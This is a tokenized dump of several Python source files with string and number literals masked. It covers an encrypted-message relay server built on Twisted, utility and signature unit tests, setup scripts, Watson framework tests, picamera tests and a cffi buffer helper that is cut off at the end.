encode ( ) <EOL> retrieval = { "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : self . baseurl + "<STR_LIT>" , <EOL> "<STR_LIT>" : rpubkey . encode ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : RT . encode ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : symkey . encode ( "<STR_LIT>" ) , <EOL> } <EOL> else : <EOL> retrieval = { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : RT . encode ( "<STR_LIT>" ) } <EOL> tpubkey = self . transport_privkey . public_key . encode ( ) <EOL> transport_generic = { "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT:url>" : self . baseurl + "<STR_LIT>" , <EOL> "<STR_LIT>" : tpubkey . encode ( "<STR_LIT>" ) <EOL> } <EOL> transport_sender = { "<STR_LIT>" : TT0 . encode ( "<STR_LIT>" ) } <EOL> return { "<STR_LIT>" : retrieval , <EOL> "<STR_LIT>" : { "<STR_LIT>" : transport_generic , <EOL> "<STR_LIT>" : transport_sender } } <EOL> def prune_old_requests ( self ) : <EOL> self . listres . prune_old_requests ( ) <EOL> def register_local_transport_handler ( self , handler ) : <EOL> self . local_transport_handler = handler <EOL> def handle_msgA ( self , msgA ) : <EOL> pubkey1_s , boxed = parseMsgA ( msgA ) <EOL> msgB = Box ( self . transport_privkey , PublicKey ( pubkey1_s ) ) . decrypt ( boxed ) <EOL> eventually ( self . handle_msgB , msgB ) <EOL> def handle_msgB ( self , msgB ) : <EOL> MSTT , msgC = parseMsgB ( msgB ) <EOL> TTID = rrid . decrypt ( self . TT_privkey , MSTT ) <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( TTID . encode ( "<STR_LIT>" ) , ) ) <EOL> row = c . fetchone ( ) <EOL> if row : <EOL> if row [ "<STR_LIT>" ] is None : <EOL> return self . local_transport_handler ( msgC ) <EOL> else : <EOL> return self . queue_msgC ( row [ "<STR_LIT:id>" ] , msgC ) <EOL> self . signal_unrecognized_TTID ( TTID ) <EOL> def queue_msgC ( self , tid , msgC ) : <EOL> self . db . insert ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( tid , len ( msgC ) , msgC . encode ( "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" ) <EOL> self . db . 
commit ( ) <EOL> def signal_unrecognized_TTID ( self , TTID ) : <EOL> raise KeyError ( "<STR_LIT>" ) <EOL> def decrypt_list_request_1 ( req ) : <EOL> tmppub , boxed0 = req [ : <NUM_LIT:32> ] , req [ <NUM_LIT:32> : ] <EOL> return tmppub , boxed0 <EOL> def decrypt_list_request_2 ( tmppub , boxed0 , retrieval_privkey ) : <EOL> nonce = "<STR_LIT:\x00>" * <NUM_LIT> <EOL> m = Box ( retrieval_privkey , PublicKey ( tmppub ) ) . decrypt ( boxed0 , nonce ) <EOL> timestamp , RT = struct . unpack ( "<STR_LIT>" , m ) <EOL> return timestamp , RT <EOL> assert struct . calcsize ( "<STR_LIT>" ) == <NUM_LIT:8> <EOL> def create_list_entry ( symkey , tmppub , length , <EOL> nonce = None , fetch_token = None , delete_token = None ) : <EOL> assert len ( tmppub ) == <NUM_LIT:32> <EOL> fetch_token = fetch_token or os . urandom ( <NUM_LIT:32> ) <EOL> delete_token = delete_token or os . urandom ( <NUM_LIT:32> ) <EOL> msg = "<STR_LIT>" + struct . pack ( "<STR_LIT>" , <EOL> tmppub , fetch_token , delete_token , length ) <EOL> nonce = nonce or os . urandom ( <NUM_LIT> ) <EOL> sbox = SecretBox ( symkey ) <EOL> return sbox . encrypt ( msg , nonce ) , fetch_token , delete_token <EOL> def encrypt_fetch_response ( symkey , fetch_token , msgC , nonce = None ) : <EOL> assert len ( fetch_token ) == <NUM_LIT:32> <EOL> msg = "<STR_LIT>" + fetch_token + msgC <EOL> nonce = nonce or os . urandom ( <NUM_LIT> ) <EOL> return SecretBox ( symkey ) . encrypt ( msg , nonce ) <EOL> class RetrievalListResource ( resource . Resource ) : <EOL> CLOCK_WINDOW = <NUM_LIT:5> * <NUM_LIT> <EOL> MAX_MESSAGES_PER_ENTRY = <NUM_LIT:10> <EOL> ENABLE_EVENTSOURCE = True <EOL> def __init__ ( self , db , retrieval_privkey ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . db = db <EOL> self . retrieval_privkey = retrieval_privkey <EOL> self . old_requests = { } <EOL> self . db . subscribe ( "<STR_LIT>" , self . new_message ) <EOL> self . subscribers = { } <EOL> def new_message ( self , notice ) : <EOL> if notice . 
action != "<STR_LIT>" : <EOL> return <EOL> v = notice . new_value <EOL> if v [ "<STR_LIT>" ] not in self . subscribers : <EOL> return <EOL> ( p , symkey , tmppub ) = self . subscribers [ v [ "<STR_LIT>" ] ] <EOL> entry = self . prepare_entry ( symkey , tmppub , v ) <EOL> p . sendEvent ( base64 . b64encode ( entry ) ) <EOL> def prune_old_requests ( self , now = None ) : <EOL> old = ( now or time . time ( ) ) - self . CLOCK_WINDOW <EOL> old_tmppubs = [ ] <EOL> for tmppub , ts in self . old_requests . items ( ) : <EOL> if ts < old : <EOL> old_tmppubs . append ( tmppub ) <EOL> for tmppub in old_tmppubs : <EOL> del self . old_requests [ tmppub ] <EOL> def render_GET ( self , request ) : <EOL> msg = base64 . urlsafe_b64decode ( request . args [ "<STR_LIT:t>" ] [ <NUM_LIT:0> ] ) <EOL> tmppub , boxed0 = decrypt_list_request_1 ( msg ) <EOL> if tmppub in self . old_requests : <EOL> request . setResponseCode ( http . BAD_REQUEST , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> ts , RT = decrypt_list_request_2 ( tmppub , boxed0 , self . retrieval_privkey ) <EOL> now = time . time ( ) <EOL> if ts < now - self . CLOCK_WINDOW or ts > now + self . CLOCK_WINDOW : <EOL> request . setResponseCode ( http . BAD_REQUEST , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> try : <EOL> tid , symkey = self . check_RT ( RT ) <EOL> except KeyError : <EOL> request . setResponseCode ( http . NOT_FOUND , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> self . old_requests [ tmppub ] = ts <EOL> all_messages = self . prepare_message_list ( tid , symkey , tmppub ) <EOL> groups = [ all_messages [ i : i + self . MAX_MESSAGES_PER_ENTRY ] <EOL> for i in range ( <NUM_LIT:0> , len ( all_messages ) , <EOL> self . MAX_MESSAGES_PER_ENTRY ) ] <EOL> entries = [ "<STR_LIT:U+0020>" . join ( [ base64 . b64encode ( e ) for e in group ] ) <EOL> for group in groups ] <EOL> if ( "<STR_LIT>" in ( request . getHeader ( "<STR_LIT>" ) or "<STR_LIT>" ) <EOL> and self . ENABLE_EVENTSOURCE ) : <EOL> if tid in self . 
subscribers : <EOL> self . subscribers [ tid ] [ <NUM_LIT:0> ] . stop ( ) <EOL> request . setHeader ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> p = EventsProtocol ( request ) <EOL> p . sendComment ( "<STR_LIT>" ) <EOL> for e in entries : <EOL> p . sendEvent ( e ) <EOL> self . subscribers [ tid ] = ( p , symkey , tmppub ) <EOL> def _done ( _ ) : <EOL> if tid in self . subscribers and self . subscribers [ tid ] [ <NUM_LIT:0> ] is p : <EOL> del self . subscribers [ tid ] <EOL> request . notifyFinish ( ) . addErrback ( _done ) <EOL> return server . NOT_DONE_YET <EOL> for e in entries : <EOL> request . write ( "<STR_LIT>" % e ) <EOL> return "<STR_LIT>" <EOL> def check_RT ( self , RT ) : <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( RT . encode ( "<STR_LIT>" ) , ) ) <EOL> row = c . fetchone ( ) <EOL> if row : <EOL> return ( row [ "<STR_LIT:id>" ] , row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> raise KeyError ( "<STR_LIT>" ) <EOL> def prepare_message_list ( self , tid , symkey , tmppub ) : <EOL> entries = [ ] <EOL> c = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( tid , ) ) <EOL> for row in c . fetchall ( ) : <EOL> entry = self . prepare_entry ( symkey , tmppub , row ) <EOL> entries . append ( entry ) <EOL> self . db . commit ( ) <EOL> return entries <EOL> def prepare_entry ( self , symkey , tmppub , c ) : <EOL> entry , fetch_token , delete_token = create_list_entry ( symkey , tmppub , <EOL> c [ "<STR_LIT>" ] ) <EOL> self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( fetch_token . encode ( "<STR_LIT>" ) , <EOL> delete_token . encode ( "<STR_LIT>" ) , <EOL> c [ "<STR_LIT:id>" ] ) ) <EOL> return entry <EOL> class RetrievalFetchResource ( resource . Resource ) : <EOL> def __init__ ( self , db ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . db = db <EOL> def render_GET ( self , request ) : <EOL> fetch_token = base64 . urlsafe_b64decode ( request . args [ "<STR_LIT:t>" ] [ <NUM_LIT:0> ] ) <EOL> c = self . 
db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( fetch_token . encode ( "<STR_LIT>" ) , ) ) <EOL> row = c . fetchone ( ) <EOL> if row : <EOL> c2 = self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , ( row [ "<STR_LIT>" ] , ) ) <EOL> symkey = c2 . fetchone ( ) [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) <EOL> self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( row [ "<STR_LIT:id>" ] , ) ) <EOL> self . db . commit ( ) <EOL> resp = encrypt_fetch_response ( symkey , fetch_token , <EOL> row [ "<STR_LIT>" ] . decode ( "<STR_LIT>" ) ) <EOL> return resp <EOL> request . setResponseCode ( http . NOT_FOUND , "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> class RetrievalDeleteResource ( resource . Resource ) : <EOL> def __init__ ( self , db ) : <EOL> resource . Resource . __init__ ( self ) <EOL> self . db = db <EOL> def render_POST ( self , request ) : <EOL> delete_token = base64 . urlsafe_b64decode ( request . args [ "<STR_LIT:t>" ] [ <NUM_LIT:0> ] ) <EOL> self . db . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( delete_token . encode ( "<STR_LIT>" ) , ) ) <EOL> self . db . commit ( ) <EOL> request . setResponseCode ( http . OK , "<STR_LIT>" ) <EOL> return "<STR_LIT>" </s>
<s> from twisted . trial import unittest <EOL> from twisted . internet import tcp , protocol <EOL> from nacl . signing import SigningKey <EOL> from nacl . exceptions import CryptoError <EOL> from . . import util , errors <EOL> class Utils ( unittest . TestCase ) : <EOL> def test_split_into ( self ) : <EOL> self . failUnlessEqual ( util . split_into ( "<STR_LIT>" , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> [ "<STR_LIT:A>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . failUnlessEqual ( util . split_into ( "<STR_LIT>" , [ <NUM_LIT:2> , <NUM_LIT:1> ] , True ) , <EOL> [ "<STR_LIT>" , "<STR_LIT:B>" , "<STR_LIT>" ] ) <EOL> self . failUnlessRaises ( ValueError , <EOL> util . split_into , "<STR_LIT>" , [ <NUM_LIT:2> , <NUM_LIT:1> ] , False ) <EOL> self . failUnlessRaises ( ValueError , <EOL> util . split_into , "<STR_LIT>" , [ <NUM_LIT:2> , <NUM_LIT:1> ] <EOL> ) <EOL> def test_ascii ( self ) : <EOL> b2a = util . to_ascii <EOL> a2b = util . from_ascii <EOL> for prefix in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> for length in range ( <NUM_LIT:0> , <NUM_LIT:100> ) : <EOL> b1 = "<STR_LIT:a>" * length <EOL> for base in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> a = b2a ( b1 , prefix , base ) <EOL> b2 = a2b ( a , prefix , base ) <EOL> self . failUnlessEqual ( b1 , b2 ) <EOL> self . failUnlessRaises ( NotImplementedError , b2a , "<STR_LIT:a>" , encoding = "<STR_LIT:none>" ) <EOL> self . failUnlessRaises ( NotImplementedError , a2b , "<STR_LIT:a>" , encoding = "<STR_LIT:none>" ) <EOL> def test_nonce ( self ) : <EOL> n1 = util . make_nonce ( ) <EOL> self . failUnlessEqual ( len ( n1 ) , <NUM_LIT> ) <EOL> n2 = util . make_nonce ( ) <EOL> self . failIfEqual ( n1 , n2 ) <EOL> def test_equal ( self ) : <EOL> self . failUnless ( util . equal ( "<STR_LIT:a>" , "<STR_LIT:a>" ) ) <EOL> self . failIf ( util . equal ( "<STR_LIT:a>" , "<STR_LIT:b>" ) ) <EOL> def test_x_or_none ( self ) : <EOL> self . failUnlessEqual ( util . 
hex_or_none ( None ) , None ) <EOL> self . failUnlessEqual ( util . hex_or_none ( "<STR_LIT:A>" ) , "<STR_LIT>" ) <EOL> self . failUnlessEqual ( util . unhex_or_none ( None ) , None ) <EOL> self . failUnlessEqual ( util . unhex_or_none ( "<STR_LIT>" ) , "<STR_LIT:B>" ) <EOL> def test_remove_prefix ( self ) : <EOL> self . failUnlessEqual ( util . remove_prefix ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> x = self . failUnlessRaises ( util . BadPrefixError , <EOL> util . remove_prefix , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . failUnlessEqual ( str ( x ) , "<STR_LIT>" ) <EOL> x = self . failUnlessRaises ( ValueError , <EOL> util . remove_prefix , "<STR_LIT>" , "<STR_LIT>" , <EOL> ValueError ) <EOL> self . failUnlessEqual ( str ( x ) , "<STR_LIT>" ) <EOL> class Signatures ( unittest . TestCase ) : <EOL> def test_verify_with_prefix ( self ) : <EOL> sk = SigningKey . generate ( ) <EOL> vk = sk . verify_key <EOL> m = "<STR_LIT:body>" <EOL> prefix = "<STR_LIT>" <EOL> sk2 = SigningKey . generate ( ) <EOL> sm1 = sk . sign ( prefix + m ) <EOL> sm2 = sk . sign ( "<STR_LIT>" + m ) <EOL> sm3 = sk2 . sign ( prefix + m ) <EOL> self . failUnlessEqual ( util . verify_with_prefix ( vk , sm1 , prefix ) , m ) <EOL> self . failUnlessRaises ( errors . BadSignatureError , <EOL> util . verify_with_prefix , vk , sm2 , prefix ) <EOL> self . failUnlessRaises ( CryptoError , <EOL> util . verify_with_prefix , vk , sm3 , prefix ) <EOL> class AllocatePort ( unittest . TestCase ) : <EOL> def test_allocate ( self ) : <EOL> port = util . allocate_port ( ) <EOL> p2 = tcp . Port ( port , protocol . Factory ( ) ) <EOL> p2 . startListening ( ) <EOL> port2 = p2 . getHost ( ) . port <EOL> d = p2 . stopListening ( ) <EOL> def _stopped ( res ) : <EOL> self . failUnlessEqual ( port , port2 ) <EOL> return res <EOL> d . addBoth ( _stopped ) <EOL> return d </s>
<s> import os , tempfile <EOL> from setuptools import setup <EOL> from distutils . command . build_scripts import build_scripts <EOL> import versioneer <EOL> commands = versioneer . get_cmdclass ( ) . copy ( ) <EOL> class my_build_scripts ( build_scripts ) : <EOL> def run ( self ) : <EOL> versions = versioneer . get_versions ( ) <EOL> tempdir = tempfile . mkdtemp ( ) <EOL> generated = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> with open ( generated , "<STR_LIT:wb>" ) as f : <EOL> for line in open ( "<STR_LIT>" , "<STR_LIT:rb>" ) : <EOL> if line . strip ( ) . decode ( "<STR_LIT:ascii>" ) == "<STR_LIT>" : <EOL> f . write ( ( '<STR_LIT>' % ( versions , ) ) . encode ( "<STR_LIT:ascii>" ) ) <EOL> else : <EOL> f . write ( line ) <EOL> self . scripts = [ generated ] <EOL> rc = build_scripts . run ( self ) <EOL> os . unlink ( generated ) <EOL> os . rmdir ( tempdir ) <EOL> return rc <EOL> commands [ "<STR_LIT>" ] = my_build_scripts <EOL> setup ( name = "<STR_LIT>" , <EOL> version = versioneer . get_version ( ) , <EOL> description = "<STR_LIT>" , <EOL> url = "<STR_LIT:url>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT:email>" , <EOL> zip_safe = True , <EOL> scripts = [ "<STR_LIT>" ] , <EOL> py_modules = [ "<STR_LIT>" ] , <EOL> cmdclass = commands , <EOL> ) </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> from distribute_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup <EOL> import repositories <EOL> try : <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) <EOL> except IOError : <EOL> long_description = '<STR_LIT>' <EOL> setup ( name = '<STR_LIT>' , <EOL> version = repositories . __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , ] , <EOL> include_package_data = True , <EOL> classifiers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from pytest import raises <EOL> from watson . di . container import IocContainer <EOL> from watson . framework import applications , config , exceptions <EOL> from watson . common . datastructures import module_to_dict <EOL> from watson . http . messages import Request <EOL> from tests . watson . framework . support import sample_environ , start_response , SampleNonStringCommand <EOL> from tests . watson . framework import sample_config <EOL> class TestBaseApplication ( object ) : <EOL> def test_call ( self ) : <EOL> with raises ( TypeError ) : <EOL> applications . Base ( ) <EOL> class TestHttpApplication ( object ) : <EOL> def test_create ( self ) : <EOL> application = applications . Http ( ) <EOL> assert isinstance ( application . container , IocContainer ) <EOL> assert application . config == module_to_dict ( config , '<STR_LIT>' ) <EOL> application_module = applications . Http ( sample_config ) <EOL> assert application_module . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def test_call ( self ) : <EOL> application = applications . Http ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:blank>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : True <EOL> } <EOL> } ) <EOL> environ = sample_environ ( PATH_INFO = '<STR_LIT:/>' , <EOL> REQUEST_METHOD = '<STR_LIT:POST>' , <EOL> HTTP_ACCEPT = '<STR_LIT:application/json>' ) <EOL> response = application ( environ , start_response ) <EOL> assert response == [ b'<STR_LIT>' ] <EOL> def test_raise_exception_event_not_found ( self ) : <EOL> application = applications . Http ( ) <EOL> response = application ( sample_environ ( PATH_INFO = '<STR_LIT:/>' ) , start_response ) <EOL> assert '<STR_LIT>' in response [ <NUM_LIT:0> ] . 
decode ( '<STR_LIT:utf-8>' ) <EOL> def test_raise_exception_event_server_error ( self ) : <EOL> application = applications . Http ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> } ) <EOL> response = application ( sample_environ ( PATH_INFO = '<STR_LIT:/>' ) , start_response ) <EOL> assert '<STR_LIT>' in response [ <NUM_LIT:0> ] . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_application_logic_error ( self ) : <EOL> application = applications . Http ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:action>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT:blank>' <EOL> } <EOL> } <EOL> } ) <EOL> response = application ( sample_environ ( PATH_INFO = '<STR_LIT:/>' ) , start_response ) <EOL> assert '<STR_LIT>' in response [ <NUM_LIT:0> ] . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_no_exception_class ( self ) : <EOL> app = applications . Http ( { '<STR_LIT>' : None } ) <EOL> assert app . exception_class is exceptions . ApplicationError <EOL> def test_no_dispatcher_render ( self ) : <EOL> with raises ( KeyError ) : <EOL> app = applications . Http ( ) <EOL> app . render ( with_dispatcher = False ) <EOL> def test_last_exception ( self ) : <EOL> environ = sample_environ ( ) <EOL> context = { <EOL> '<STR_LIT>' : Request . from_environ ( environ ) <EOL> } <EOL> app = applications . Http ( ) <EOL> response , view_model = app . exception ( <EOL> last_exception = True , exception = Exception ( '<STR_LIT:test>' ) , context = context ) <EOL> assert '<STR_LIT>' in response . body <EOL> class TestConsoleApplication ( object ) : <EOL> def test_create ( self ) : <EOL> application = applications . Console ( ) <EOL> assert isinstance ( application . 
container , IocContainer ) <EOL> def test_register_commands ( self ) : <EOL> application = applications . Console ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> SampleNonStringCommand ] <EOL> } ) <EOL> assert len ( application . config [ '<STR_LIT>' ] ) == <NUM_LIT:4> <EOL> def test_execute_command ( self ) : <EOL> application = applications . Console ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> SampleNonStringCommand ] <EOL> } ) <EOL> assert application ( [ '<STR_LIT>' , '<STR_LIT:string>' , '<STR_LIT>' ] ) == '<STR_LIT>' <EOL> assert not application . get_command ( '<STR_LIT:test>' ) </s>
<s> import os <EOL> from watson . console import command <EOL> from watson . console . decorators import arg <EOL> from watson . common . imports import load_definition_from_string <EOL> from watson . di import ContainerAware <EOL> from watson . dev . server import make_dev_server <EOL> class Dev ( command . Base , ContainerAware ) : <EOL> """<STR_LIT>""" <EOL> @ arg ( '<STR_LIT:host>' , optional = True ) <EOL> @ arg ( '<STR_LIT:port>' , optional = True ) <EOL> @ arg ( '<STR_LIT>' , optional = True , default = False ) <EOL> def runserver ( self , host , port , noreload ) : <EOL> """<STR_LIT>""" <EOL> app_dir = os . environ [ '<STR_LIT>' ] <EOL> app_module = os . environ [ '<STR_LIT>' ] <EOL> script_dir = os . environ [ '<STR_LIT>' ] <EOL> public_dir = os . environ [ '<STR_LIT>' ] <EOL> os . chdir ( app_dir ) <EOL> app = load_definition_from_string ( '<STR_LIT>' . format ( <EOL> app_module ) ) <EOL> kwargs = { <EOL> '<STR_LIT>' : app , <EOL> '<STR_LIT>' : script_dir , <EOL> '<STR_LIT>' : public_dir , <EOL> } <EOL> if host : <EOL> kwargs [ '<STR_LIT:host>' ] = host <EOL> if port : <EOL> kwargs [ '<STR_LIT:port>' ] = int ( port ) <EOL> kwargs [ '<STR_LIT>' ] = True if noreload else False <EOL> make_dev_server ( ** kwargs ) </s>
<s> from __future__ import ( <EOL> unicode_literals , <EOL> print_function , <EOL> division , <EOL> absolute_import , <EOL> ) <EOL> str = type ( '<STR_LIT>' ) <EOL> import ctypes as ct <EOL> import picamera . mmal as mmal <EOL> import picamera <EOL> import pytest <EOL> import mock <EOL> def test_camera_init ( ) : <EOL> with mock . patch ( '<STR_LIT>' ) as bcm_host , mock . patch ( '<STR_LIT>' ) as mmal , mock . patch ( '<STR_LIT>' ) as ct : <EOL> mmal . mmal_component_create . return_value = <NUM_LIT:1> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> mmal . mmal_component_create . return_value = <NUM_LIT:0> <EOL> ct . POINTER . return_value . return_value [ <NUM_LIT:0> ] . output_num = <NUM_LIT:0> <EOL> ct . sizeof . return_value = <NUM_LIT:0> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] == "<STR_LIT>" <EOL> ct . POINTER . return_value . return_value [ <NUM_LIT:0> ] . output_num = <NUM_LIT:3> <EOL> mmal . mmal_port_parameter_set . side_effect = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> mmal . mmal_port_parameter_set . side_effect = None <EOL> mmal . mmal_port_parameter_set . return_value = <NUM_LIT:0> <EOL> mmal . mmal_port_enable . return_value = <NUM_LIT:1> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> mmal . mmal_port_enable . return_value = <NUM_LIT:0> <EOL> mmal . mmal_port_format_commit . return_value = <NUM_LIT:0> <EOL> for p in picamera . PiCamera . CAMERA_PORTS : <EOL> ct . POINTER . return_value . return_value [ <NUM_LIT:0> ] . 
output [ p ] [ <NUM_LIT:0> ] . buffer_num = <NUM_LIT:1> <EOL> mmal . mmal_component_enable . return_value = <NUM_LIT:1> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> def test_camera_led ( ) : <EOL> with mock . patch ( '<STR_LIT>' ) as GPIO : <EOL> GPIO . RPI_REVISION = <NUM_LIT:1> <EOL> with picamera . PiCamera ( ) as camera : <EOL> camera . led = True <EOL> GPIO . setmode . assert_called_once_with ( GPIO . BCM ) <EOL> GPIO . setup . assert_called_once_with ( <NUM_LIT:5> , GPIO . OUT , initial = GPIO . LOW ) <EOL> GPIO . output . assert_called_with ( <NUM_LIT:5> , True ) <EOL> camera . led = False <EOL> GPIO . output . assert_called_with ( <NUM_LIT:5> , False ) <EOL> with pytest . raises ( AttributeError ) : <EOL> camera . led </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals , division , absolute_import , print_function <EOL> import sys <EOL> from . _types import str_cls , byte_cls , int_types , bytes_to_list <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:null>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> try : <EOL> from cffi import FFI <EOL> _ffi_registry = { } <EOL> ffi = FFI ( ) <EOL> def register_ffi ( library , ffi_obj ) : <EOL> _ffi_registry [ library ] = ffi_obj <EOL> def _get_ffi ( library ) : <EOL> if library in _ffi_registry : <EOL> return _ffi_registry [ library ] <EOL> return ffi <EOL> def buffer_from_bytes ( initializer ) : <EOL> return ffi . new ( '<STR_LIT>' , initializer ) <EOL> def buffer_from_unicode ( initializer ) : <EOL> return ffi . new ( '<STR_LIT>' , initializer ) <EOL> def write_to_buffer ( buffer , data , offset = <NUM_LIT:0> ) : <EOL> buffer [ offset : offset + len ( data ) ] = data <EOL> def buffer_pointer ( buffer ) : <EOL> return ffi . new ( '<STR_LIT>' , [ buffer ] ) <EOL> def cast ( library , type_ , value ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . cast ( type_ , value ) <EOL> def sizeof ( library , value ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . sizeof ( value ) <EOL> def bytes_from_buffer ( buffer , maxlen = None ) : <EOL> if maxlen is not None : <EOL> return ffi . buffer ( buffer , maxlen ) [ : ] <EOL> return ffi . buffer ( buffer ) [ : ] <EOL> def byte_string_from_buffer ( buffer ) : <EOL> return ffi . 
